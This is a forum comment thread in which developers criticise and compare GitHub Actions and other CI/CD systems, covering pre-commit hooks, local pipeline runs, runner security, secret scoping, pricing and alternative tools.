The conclusion of course is that whoever invented this stuff really wasn't thinking clearly and certainly didn't have the time to write decent documentation to explain what they were thinking. And now the whole world has to try to deal with their mess.
My theory as to how this ends up happening is that the people creating the thing began with some precursor thing as their model. They made the new thing as "old thing, with a few issues fixed". Except they didn't fully understand the concepts in that thing, and we never got to see that thing. You'll see many projects that have this form: bun is "yarn fixed". Yarn is "npm fixed". And so on. None of these projects ever has to fully articulate their concepts.
Instead, have tooling to do that before committing (vscode format-on-save, or manually run a task), then have a pre-commit hook just do a sanity-check on that. It only needs to check modified files, so usually very fast.
Then, have an additional check on CI to verify formatting on all files. That should rarely be triggered, but helps to catch cases where the hooks were not run, for example from external contributes. That also makes it completely fine for this CI step to take a couple of minutes - you don't need that feedback immediately.
Though it would be sort of interesting or maybe just amusing if you made something like ssh-agent but for 'git commit' and your test runner. Only allow commits when all files are older than your last green test run.
You have no idea how much I'd love that feature. Inasmuch as "save" is still a thing anyway. I don't miss explicit saves in IDEA, I see commit as the "real" save operation now, and I don't mind being able to hook that in an IDE-independent way.
I think the UX of git hooks has been sub-par for sure, but tools like the confusingly named pre-commit are helping there.
I don’t want to think about formatting, I just want everything to be consistent. A pre commit hook can run those tools for me, and if any changes occurred, it can add them to the commit.
If people want to die on a hill that is demonstrably causing problems for all of their coworkers then let em.
Example config: https://github.com/anttiharju/vmatch/blob/9e64b0636601c236a5...
[0] : https://man.sr.ht/builds.sr.ht/
I don't use sourcehut, but interpreting what you wrote I'd argue this is an antifeature and would be a dealbreaker for me. CI typically evolves with the underlying code and decoupling that from the code makes it difficult to go backwards. It loses cohesion.
If you put the build files in a .builds/ folder at the root of your repository, they will be run upon each commit. Just like in github or gitlab. You are just not forced into this way of life.
If you prefer, you can store the build files separately, and run them independently of your commits. Moreover, the build files don't need to be associated to any repository, inside or outside sourcehut.
https://news.ycombinator.com/item?id=18983586
https://rewiring.bearblog.dev/blog/?q=azure
PS: I am not the author of any of these posts.
The worst kind of downtime is when you go down but nobody else has.
Documentation for GitHub Actions says, "If you specify the access for any of these permissions, all of those that are not specified are set to none." The article says "I do think a better "default" would be to start with no privileges and require the user to add whatever is needed", and it would seem that this is already the case if you explicitly add a "permissions" command into your GitHub Actions file. So, it would seem that the "default permissions" are only used if you do not add the "permissions" command, although maybe that is not what it means and the documentation is confusing; if so, then it should be corrected. Anyways, you can also change the default permission setting to restrictive or permissive (and probably ought to be restrictive by default).
Allowing to set finer permissions probably would also help.
Stop rebasing.
This should only happen if absolutely necessary to fix major merge mistakes.
Rebasing changes history and I've seen more problems prevented from removing it as a CI strategy.
Every CI strategy I've seen relying on rebasing had a better alternative in SDLC. You just need to level up your project management, period.
It also has the problem of not having a local dev runner for actions. The "inner loop" is atrociously slow and involves spamming your colleagues with "build failed" about a thousand times, whether you like it or not.
IMHO, a future DevOps runner system must be an open-source, local-first. Anything else is madness.
Right now we're in the "mainframe era" of DevOps, where we edit text files in baroque formats with virtually no tooling assistance, "submit" that to a proprietary batch system on a remote server that puts it into a queue... then come back after our coffee to read through the log printout.
I should buy a dot matrix printer to really immerse myself into the paradigm.
The entire code is a wonderful mess. We found that when we early-adopted ephemeral runners, that the control flow is full of races and the status code you get at the end is indicative of exactly nothing. So even if the backend is just having a hickup picking up a job with an obscure Azure error code, you better just throw that entire VM away, because you can't know if that runner will ever recover or has already done things to break the next run.
Although, I never saw a public announcement of this discontinuation, ADO is kind of abandoned AFAICT and even their landing page hints to use GitHub Enterprise instead [1].
[1] https://azure.microsoft.com/en-us/products/devops
It turns out, the last person to change cron __schedule__ (not the workflow file in general) is an 'actor' associated with this workflow. Very, very confusing implementation. Error messages are even more confusing - workflow runs are renamed as "{Unknown event}" and the message is "Email is unverified".
Link to docs: https://docs.github.com/en/actions/writing-workflows/choosin...
IIRC, GitHub recommends this practice in their docs, with a username of "YOUR_USERNAME-machine".
The machine user is just an ordinary GitHub user, added as a member of the organization, with all the necessary repo permissions, and a generated access token added to the GH repo Secrets. The organization owner then manages this GH machine account as well as the org, and their own personal (or work) login account.
We have not hit any rate limiting so far, but we're a relatively small team -- a dozen devs, a few hundred commits per day that trigger CI (we don't do CD), across half a dozen active repos.
Maybe it was just the pain of switching but that was my initial impression.
I pair it with bash scripts where I find important to run outside GitHub facilitating test and maintenance.
Although, I still find need to run multiple times or iterate over the actual GitHub action run time, which is a bit slow to iterate but find it best to catch any issues. If the dev feedback loop fixed it save me a lot of precious time. I know there’s a third party to run locally but it’s not the same…
Thus, bash scripting is great due to portability.
I take this a step further and approach CI with the mentality that I should be able to run all of my CI jobs locally with a decent interface (i.e. not by running 10 steps in a row), and then I use CI to automate my workflow (or scale it, as the case may be). But it always starts with being able to run a given task locally and then building CI on top of it, not building it in CI in the first place.
Nothing beats having a single script to bootstrap and run the whole pipeline e.g. `make ci`.
This means that for anything that needs to gracefully cancel, like for example terraform, it's screwed.
Want to cancel a run? Maybe you've got a plan being generated for every commit on a branch, but you push an update. Should be ok for GitHub to stop the previous run and run the action for the updated code, right? WRONG! That's a quick way to a broken state.
This is so frustrating. Having to inject a PAT into the workflow just so it will kick off another workflow is not only annoying but it just feels wrong. Also not lots of operations are tied to my user which I don't like.
> It doesn't help that you can't really try any of this locally (I know of [act](https://github.com/nektos/act) but it only supports a small subset of the things you're trying to do in CI).
This is the biggest issue with GH Actions (and most CIs), testing your flows locally is hard if not impossible
All that said I think I prefer GH Actions over everything else I've used (Jenkins and GitLab), it just still has major shortcomings.
I highly recommend you use custom runners. The speed increase and cost savings are significant. I use WarpBuild [0] and have been very happy with them. I always look at alternatives when they are mentioned but I don't think I've found another service that provides macOS runners.
[0] https://www.warpbuild.com
[0] https://depot.dev/docs/github-actions/runner-types
We have a very complicated build process in my current project, but our CI pipelines are actually just a couple of hundred of lines of GHA yaml. Most of which are boilerplate or doing stuff like posting PR comments. The actual logic is in NX configuration.
Outside of locking down edit access to the .github workflow yml files I'm not sure how vulnerabilities like this can be prevented.
Presumably anything configured via a .github workflow wouldn't assure safety, as those files can be edited to trigger unexpected actions like deploys on working branches. Our Github Action workflow yml file had a check to only deploy for changes to the main branch. The deploy got triggered because that check got removed from the workflow file in a commit on a working branch.
You create an environment, restrict it to the main branch, add your secret to it and then tie your deploy workflow to it.
If someone runs that workflow against another branch it will run but it won’t be able to access those secrets.
[0] https://docs.github.com/en/actions/managing-workflow-runs-an...
But for actually good security CI and CD should be different tools.
The problem is it's still possible to work around those controls unless you create some YAML monstrosity that stops people from making the mistake in the first place.
- Self-hosting on your aws/gcp/azure account can get a little tricky. `actions-runner-controller` is nice but runs your workflows within a docker container in k8s, which leads to complex handling for isolation, cost controls because of NAT etc.
- Multi-arch container builds require emulation and can be extremely slow by default.
- The cache limits are absurd.
- The macos runners are slow and overpriced (arguably, most of their runners are).
Over the last year, we spent a good amount of time solving many of these issues with WarpBuild[1]. Having unlimited cache sizes, remote multi-arch docker builders with automatic caching, and ability to self-host runners in your aws/gcp/azure account are valuable to minimize cost and optimize performance.
[1] https://warpbuild.com
[1] https://github.com/earthly/earthly/commit/6d7f6786ad9fa4392f... [2] https://github.com/earthly/earthly/commit/89d31fc014a8980a50...
I am really really hoping that someone (not me, I've already tried and failed) could slim it down into a single-purpose, self-contained, community maintainable tool ...
What a cool looking website. What kind of tool do you need to create those animations?
[1]https://github.com/nektos/act
https://github.com/StefMa/pkl-gha
It could save you already some time.
https://jibril.sh
Go look at your workflows and see how much of the runtime is spent running installers upon installers for various languages, package managers and so on. Containers were not supposed to be like this.
See: https://packetlost.dev/Why%20Does%20CI%20Suck
Why not align these tools? Then there might be less pain. What a good idea.
Eventually we tried dropping that requirement and instead relied on testing main before deploying to production. It sped us up again, and main never broke because of bad merges while I was there.
Like othes have suggested, keep the actions simple by having lots of scripts which you can iterate on locally and making the actions dump to just run the scripts
None of it usefully explains how GHA works from the ground up, in a way that would help me solve problems I encounter.
We moved to dagger to get replicable local pipeline runs, escape the gitlab DSL, and get the enormous benefits of caching.
We have explicitly chosen to avoid using the "daggerverse", and with that the cross-language stuff. Reason being that it makes modifying our pipeline slower and harder -- the opposite of the reason we moved to dagger.
So we use the Dagger python API to define and run our CI builds. It's great!
Like the other comments on this page about dagger, the move to "integrate AI" is highly concerning. I am hopeful that they won't continue down this path, but clearly the AI hype bubble is strong and at least some of the dagger team are inside it.
I'm speculating that if the dagger team doesn't drop the AI stuff, then the dagger project will end. A fork will pop-up and we'll move to using that. Not an expert (yet!) in the buildkit API, but it seems like the stuff we're benefiting from with dagger is really just a thin wrapper around buildkit. So potentially not too challenging to create a drop-in replacement if necessary later.
But, there are so many red flags in this post. Clearly this corp does not know how to build, test and release professional software.
I hope Actions stays bad tho. We need more folks to get off proprietary code forges for their open source projects—& a better CI + a better review model (PRs are awful) are 2 very low-hanging fruit that would entice folks off of the platform not for the philosophical reasons such as not supporting US corporations or endangering contributor privacy by making them agree to Microsoft’s ToS, but for technical superiority on the platform itself.
you just activate some probes and write SQL queries to sift through the information.
But two major pains I did not see : the atrocious UI and the pricing.
Their pricing model goes against any good practice, as it counts a minute for any job even if it runs for 2 seconds. Let's say you run 100jobs in parallel and they all take 30sec. You will pay 100 minutes instead of 50. Now translate this to an enterprise operating at a big scale and I assure you have seen crazy differences between actual time and billable time.
Most of the time, I'm just running dotnet build to a zip file and s3 bucket. Then, some code or script picks it up on the other side. Things get much trickier when you're using multiple services, languages, runtimes, database technologies, etc.
https://github.com/rails/rails/pull/54693
There are better solutions out there.
I was doing things more than 20 years ago in Hudson that GHA can't do now.
A 1000% yes, because it means the default experice most devs have of CI is using ephemeral runners which is a massive win for security and build rot.
Every company I've worked at with stateful runners was a security incident begging to happen, not to mention builds that would do different things depending on what runner host you got placed on (devs manually installing different versions of things on hosts, etc)
And what are those?
Anda a lot more flexibility in terms of what can you do.
There's also the Woodpecker CI fork, which has a very similar user experience: https://woodpecker-ci.org/
When combined with Docker images, it's quite pleasant to use - you define what environment you want for the CI/CD steps, what configuration/secrets you need and define the steps (which can also just be a collection of scripts that you can run locally if need be), that's it.
Standalone, so you can integrate it with Gogs, Gitea or similar solutions for source control and perhaps a bit simpler than GitLab CI (which I also think is lovely, though maintaining on-prem GitLab isn't quite a nice experience all the time, not that you have to do that).
Could we not usually say most software could be documented better. I do not think GitHub Actions ranks near the bottom in terms of documentation and user experience overall. I do understand your point though.